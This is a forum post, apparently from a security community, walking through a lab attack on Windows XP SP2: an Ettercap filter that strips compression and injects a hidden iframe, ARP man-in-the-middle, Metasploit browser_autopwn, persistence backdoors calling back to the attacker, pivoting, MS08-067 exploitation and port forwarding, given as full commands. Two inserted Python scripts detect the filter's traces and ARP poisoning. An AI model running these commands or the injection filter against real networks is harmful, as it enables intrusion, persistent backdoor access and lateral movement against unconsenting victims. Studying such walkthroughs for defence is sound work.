Thread: [Video] Owning Windows (XP SP2 vs. Metasploit's browser_AutoPWN)

  1. #1
    Posted by g0tmi1k (Moderator, joined Feb 2010)

    [Video] Owning Windows (XP SP2 vs. Metasploit's browser_AutoPWN)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4654173/
    Download video:
    http://www.mediafire.com/?8ccnw93h6skqbas
    Download Script (iFrame_v2.zip): http://www.mediafire.com/?8mlgidgxlkv76qn


    Brief Overview
    This screencast starts off by carrying out a “Man In The Middle” (MITM) attack, to inject traffic making the target vulnerable to “Cross Site Scripting” (XSS) which is linked to Metasploit's “Browser_AutoPWN” feature.
    Upon being compromised, the attacker chooses to explore and exploit other devices which are attached to the internal network (Pivoting). To finalise, the attacker gains access to view the internal server via “Port Forwarding”.
    The attacker also installs backdoors into the network, allowing them to connect back at any stage.


    Scenario/Setup
    This is the second video in a series of attacking Operating Systems and our target has now updated to Windows XP Service Pack 2, in the aid of seeking better security, after becoming compromised previously.




    What do I need?

    • Ettercap – (Can be found on BackTrack 4-R2)
    • iFrame.filter (Can either be downloaded from “links” at the top or manually created from the code below)
    • Metasploit – (Can be found on BackTrack 4-R2)
    • Internet Browser – (Firefox can be found on BackTrack 4-R2)
    • Text Editor – (Kate can be found on BackTrack 4-R2)


    iFrame.filter
    Code:
    ########################################################################
    # iFrame.filter v2   --- Ettercap Filter (iFrame injection)            #
    # g0tmi1k 2011-03-09 --- 7x 192.168.0.33 <--- including this one!      #
    ########################################################################
    if (ip.proto == TCP && ip.dst != "192.168.0.33") {                 # If traffic is TCP protocol and it's not coming to us....
       if (search(DATA.data, "gzip")) {                                # ...and if it contains a gzip in its header:
          replace("gzip", "    ");                                     # Ask the server not to encode packets - only use plain text ;) *Four spaces to match original string*
          msg("[*] Zapped 'gzip'\n");                                  # Let us know it's been done (=
       }
       if (search(DATA.data, "deflate")) {
          replace("deflate", "       ");
          msg("[*] Zapped 'deflate'\n");
       }
       if (search(DATA.data, "gzip,deflate")) {
          replace("gzip,deflate", "            ");
          msg("[*] Zapped 'gzip,deflate'\n");
       }
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          msg("[*] Zapped 'Accept-Encoding'\n");
       }
    #-----------------------------------------------------------------------
       if (search(DATA.data, "</title>")){                                                                                          # Is there something for us to inject into?
          replace("</title>","</title><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");   # ...Insert our iframe to the webpage!
          msg("[>] Injecting into (</title>)\n");                                                                                   # Let us know we have done it (=
       }
       if (search(DATA.data, "</TITLE>")){
          replace("</TITLE>","</TITLE><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");
          msg("[>] Injecting into (</TITLE>)\n");
       }
       if (search(DATA.data, "body>")){
          replace("body>","body><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");
          msg("[>] Injecting into (body>)\n");
       }
       if (search(DATA.data, "BODY>")){
          replace("BODY>","BODY><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");
          msg("[>] Injecting into (BODY>)\n");
       }
    
       if (search(DATA.data, "http://192.168.0.33")){                  # ...and search data, to test for our 'tweak' ;)
          msg("[+] Injected correctly!\n");                            # Let us know it's been done
       }
    }
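    As an added defensive example (not part of g0tmi1k's post or the iFrame.filter script), the following Python checks one HTTP request and one HTTP response for the traces a filter like the one above leaves in traffic: the header renamed to Accept-Rubbish!, an Accept-Encoding header whose value was blanked in transit, and a zero-size iframe sitting directly on one of the injection anchors (</title>, <body ...> or </body>). The request and response strings are constructed samples, and 192.168.0.33 is the address the filter uses; the function names and regexes are mine, not from the post.

```python
import re
from typing import List

# Request-side traces of the filter: "Accept-Encoding" rewritten to
# "Accept-Rubbish!" (the literal used by the filter above), or left in place
# but with its value blanked, so the server answers in plain text.
TAMPERED_HEADER_RE = re.compile(r"^Accept-Rubbish!:", re.M | re.I)
BLANKED_ENCODING_RE = re.compile(r"^Accept-Encoding:[ \t,]*\r?$", re.M | re.I)

# Response-side trace: a 0x0 iframe placed right after </title>, <body ...>
# or </body>, the anchors the filter injects into.
HIDDEN_IFRAME_RE = re.compile(
    r"(</title>|<body\b[^>]*>|</body>)\s*"
    r"(<iframe\b[^>]*\bwidth=[\"']?0[\"']?(?=[\s/>])"
    r"[^>]*\bheight=[\"']?0[\"']?(?=[\s/>])[^>]*>)",
    re.I,
)
SRC_RE = re.compile(r"\bsrc=[\"']?([^\"'\s>]+)", re.I)


def scan_request(raw_request: str) -> List[str]:
    """Return a list of findings for one raw HTTP request (headers as text)."""
    findings: List[str] = []
    if TAMPERED_HEADER_RE.search(raw_request):
        findings.append("Accept-Encoding renamed to Accept-Rubbish! (filter signature)")
    if BLANKED_ENCODING_RE.search(raw_request):
        findings.append("Accept-Encoding present but emptied (compression stripped in transit)")
    return findings


def scan_response(raw_response: str) -> List[str]:
    """Return one finding per hidden iframe sitting on an injection anchor."""
    findings: List[str] = []
    for match in HIDDEN_IFRAME_RE.finditer(raw_response):
        anchor, tag = match.group(1), match.group(2)
        src = SRC_RE.search(tag)
        findings.append(f"hidden iframe after {anchor} -> {src.group(1) if src else '?'}")
    return findings


# Constructed sample traffic, shaped the way the filter would leave it
# (not a capture from the video).
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Accept-Rubbish!:     ,       \r\n"   # "gzip,deflate" blanked, header renamed
    "\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><head><title>Example</title>"
    '<iframe src="http://192.168.0.33" width="0" height="0" frameBorder="0"></iframe>'
    "</head><body>hello</body></html>"
)
CLEAN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n\r\n"
    "<html><head><title>Example</title></head><body>hello</body></html>"
)

if __name__ == "__main__":
    for line in scan_request(SAMPLE_REQUEST) + scan_response(SAMPLE_RESPONSE):
        print("[!]", line)
    print("[ ] clean response findings:", scan_response(CLEAN_RESPONSE))
```

    The Accept-Rubbish! string is specific to this filter and is the least portable check; the emptied Accept-Encoding header and a 0x0 iframe glued to a structural tag are the indicators worth keeping in a proxy or IDS rule, since any filter of this kind must disable compression before it can rewrite the page.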
    Method
    • Start network services, obtain an IP address and start PostgreSQL
    • Start Metasploit and configure browser_autopwn to allow browser exploits
    • Set up Ettercap, prepare and compile filter
    • Once Metasploit is ready, perform an ARP MITM attack
    • Wait for target to visit a web page
    • When a session has been established, create a backdoor
    • Collect information on target
    • Start pivoting and scanning for other nodes
    • Perform a remote exploit
    • Create a backdoor, collect information, start pivoting and scanning... again
    • Once a web server has been detected, port forward, allowing the target's content to be viewed
    • Game Over
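    The MITM step in the method above depends on ARP poisoning of both the gateway and the target. As an added example that is not from the original post, the following Python shows the two indicators a network monitor can alert on: an IP whose sender MAC changes from the one first learned, and a single MAC answering for several IPs at once. The ARP observations are a constructed sample (the addresses and MACs are made up), and the function name is mine.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# (seconds since capture start, sender IP, sender MAC) for each ARP reply seen.
ArpReply = Tuple[int, str, str]

# Constructed sample, not a capture: three hosts behave normally, then at t=10
# one MAC starts answering for both the gateway (.1) and a workstation (.50),
# which is the two-sided poisoning that puts an attacker between them.
SAMPLE_ARP_REPLIES: List[ArpReply] = [
    (0, "192.168.0.1", "00:11:22:33:44:01"),
    (1, "192.168.0.50", "00:11:22:33:44:50"),
    (2, "192.168.0.33", "00:11:22:33:44:33"),
    (10, "192.168.0.1", "00:11:22:33:44:33"),
    (10, "192.168.0.50", "00:11:22:33:44:33"),
]


def detect_arp_poisoning(replies: Iterable[ArpReply]) -> List[str]:
    """Return alerts for IP->MAC flips and for MACs claiming several IPs."""
    first_seen: Dict[str, str] = {}                      # IP -> MAC learned first
    ips_per_mac: Dict[str, Set[str]] = defaultdict(set)  # MAC -> IPs it answered for
    alerts: List[str] = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        ips_per_mac[mac].add(ip)
        if ip not in first_seen:
            first_seen[ip] = mac
        elif first_seen[ip] != mac:
            alerts.append(f"t={ts}: {ip} moved from {first_seen[ip]} to {mac}")
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            alerts.append(f"{mac} answers for {len(ips)} addresses: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES):
        print("[!]", alert)
```

    A learned-first baseline produces one alert per legitimate NIC replacement or DHCP reassignment, so in practice the gateway mapping is pinned statically and the "one MAC, many IPs" rule carries most of the weight: a host answering for the default gateway and for another workstation at the same moment has no benign explanation on a normal LAN.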



    Commands
    Code:
    start-network
    dhclient eth0
    /etc/init.d/postgresql-8.3 start
    clear
    
    msfconsole
    search autopwn
    use server/browser_autopwn
    show options
    set LHOST 192.168.0.33
    set SRVPORT 80
    set URIPATH /
    show options
    run
    
    kate /etc/etter.conf -> ec_uid = 0 -> ec_gid = 0 -> redir_command_on -> redir_command_off -> Save
    cat iFrame.filter
    etterfilter iFrame.filter -o iFrame.ef
    ettercap -T -q -i eth0 -F iFrame.ef -M ARP // // 
    
    ettercap -> q
    
    sessions -l -v
    sessions -i 1
    sysinfo
    run persistence -X -i 5 -p 445 -r 192.168.0.33
    reboot
    
    search handler
    use multi/handler
    show options
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.0.33
    set LPORT 445
    show options
    exploit -j
    
    jobs
    kill 0
    jobs
    
    sessions -l -v
    sessions -i 2
    sysinfo
    getuid
    run checkvm
    ipconfig
    
    run get_local_subnets
    run autoroute -p 
    run autoroute -s 10.0.0.0/8
    run autoroute -p
    
    run arp_scanner -r 10.0.0.0/24
    background
    search portscan
    use scanner/portscan/tcp
    show options
    setg RHOSTS 10.0.0.101
    setg PORTS 80,137,139,445
    setg THREADS 50
    show options
    run
    
    search ms08_067_netapi
    use windows/smb/ms08_067_netapi
    show options
    set RHOST 10.0.0.101
    set PAYLOAD windows/meterpreter/bind_tcp
    set LPORT 4445
    show options
    exploit
    
    run metsvc
    exit
    
    search handler
    use multi/handler
    show options
    set PAYLOAD windows/metsvc_bind_tcp 
    set LPORT 31337
    set RHOST 10.0.0.101
    show options
    exploit
    
    sysinfo
    getuid
    ipconfig
    
    run get_local_subnets
    run autoroute -p
    run autoroute -s 172.16.0.0/12
    run autoroute -p 
    
    run arp_scanner -r 172.16.0.0/24
    background
    use scanner/portscan/syn
    show options
    set RHOSTS 172.16.0.33
    set PORTS 80,137,139,445
    set THREADS 50
    show options
    run
    
    sessions -l 
    sessions -i 4
    portfwd
    portfwd add -l 8080 -p 80 -r 172.16.0.33
    portfwd
    
    firefox localhost:8080
    Last edited by g0tmi1k; 03-09-2011 at 11:06 PM.
    Have you...g0tmi1k?
